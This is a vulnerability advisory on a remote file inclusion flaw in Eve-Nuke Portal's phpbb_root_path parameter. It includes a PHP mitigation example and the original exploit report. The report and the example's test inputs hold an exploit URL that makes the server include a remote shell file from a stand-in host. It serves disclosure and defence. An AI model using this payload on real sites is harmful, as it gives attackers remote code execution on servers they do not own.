vendor: Eve-Nuke Portal
by: ThE TiGeR
CVSS: 7.5 (HIGH)
File Inclusion
CWE: 98
Product Name: Eve-Nuke Portal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Eve-NukePortal file include (phpbb_root_path)

The vulnerability allows an attacker to include arbitrary files from the server by manipulating the 'phpbb_root_path' parameter in the URL, because the script concatenates that value into the path passed to require().

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files.
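
The mitigation above, as an added PHP example (not Eve-Nuke Portal code): the include root is a fixed constant, so a request's phpbb_root_path value is never consulted, and every include target must resolve to an existing local file under that root. FORUM_ROOT, forum_include_path() and the temporary demo tree are hypothetical; the check goes beyond the page's case by also covering an untrusted relative part.

```php
<?php
// Added example, not Eve-Nuke Portal code; FORUM_ROOT and forum_include_path()
// are hypothetical names. php.ini hardening that also applies:
// allow_url_include = Off, register_globals = Off.

// Constructed demo tree so the script runs anywhere. A real install would
// define the root once, in its bootstrap file, from __DIR__.
$demoRoot = sys_get_temp_dir() . '/en_forums_demo_' . getmypid();
mkdir($demoRoot . '/includes', 0700, true);
file_put_contents($demoRoot . '/includes/functions_nuke.php', "<?php // stub\n");
file_put_contents($demoRoot . '_outside.php', "<?php // stub\n");
define('FORUM_ROOT', realpath($demoRoot));

/**
 * Resolve $relative under FORUM_ROOT. Throws unless the result is an existing
 * local file inside the root, so URLs and ../ traversal are both refused.
 */
function forum_include_path(string $relative): string
{
    $base = rtrim(FORUM_ROOT, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $full = realpath($base . $relative);   // false for URLs and missing files
    if ($full === false || !is_file($full)) {
        throw new RuntimeException('not a local file under the forum root');
    }
    // Compare against the root *with* its trailing separator, otherwise a
    // sibling such as "<root>_outside.php" would pass a plain prefix test.
    if (strncmp($full, $base, strlen($base)) !== 0) {
        throw new RuntimeException('path escapes the forum root');
    }
    return $full;
}

// The root always comes from FORUM_ROOT; no request parameter can replace it.
$phpEx = 'php';   // fixed by the application, not by the request

// Constructed inputs: one legitimate target and two that must be refused.
$candidates = [
    'includes/functions_nuke.' . $phpEx,            // legitimate include
    'http://www.site.com/shell.txt?',               // URL value from this page
    '../' . basename(FORUM_ROOT) . '_outside.php',  // existing file outside root
];
foreach ($candidates as $relative) {
    try {
        require_once forum_include_path($relative);
        echo "included: $relative\n";
    } catch (RuntimeException $e) {
        echo "rejected: $relative ({$e->getMessage()})\n";
    }
}
```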

Exploit-DB raw data:

#===========================================================================================
#Eve-NukePortal file include (phpbb_root_path)
#===========================================================================================
#
#Script name :Eve-Nuke Portal
#
#Download script : http://puzzle.dl.sourceforge.net/sourceforge/eve-nuke/en-forums-beta.zip
#
#===========================================================================================
#Vulnerable Code :
#
#require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);
#
#===========================================================================================
#Exploit :
#
#http://www.site.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.site.com/shell.txt?
#
#===========================================================================================
#
#Discovered By : ThE TiGeR
#
#Contact : miro_tiger100[at]hotmail[dot]com
#
#===========================================================================================

# milw0rm.com [2007-03-27]